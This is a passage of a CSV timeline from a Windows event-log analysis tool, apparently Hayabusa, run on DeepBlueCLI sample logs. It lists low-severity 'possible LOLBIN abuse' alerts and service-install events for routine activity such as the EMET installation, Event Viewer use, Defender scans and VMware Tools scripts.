User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,,New Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | 
LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:53.121 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1360 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:10:30.765 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:46:22.988 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1780 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:46:23.139 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x100 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:46:23.201 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:48:22.957 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:00:00.476 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:04:56.561 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:05:21.063 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:14.714 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:14.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.238 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.356 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.409 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.433 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:12:39.484 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:14:02.255 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:14:02.270 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 00:53:11.002 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 01:40:58.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 01:41:25.835 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.297 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.345 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.364 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.383 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 03:18:00.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 04:22:52.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 04:25:19.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 04:25:27.075 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 06:16:47.905 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 06:24:11.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 06:24:11.188 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:42:26.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 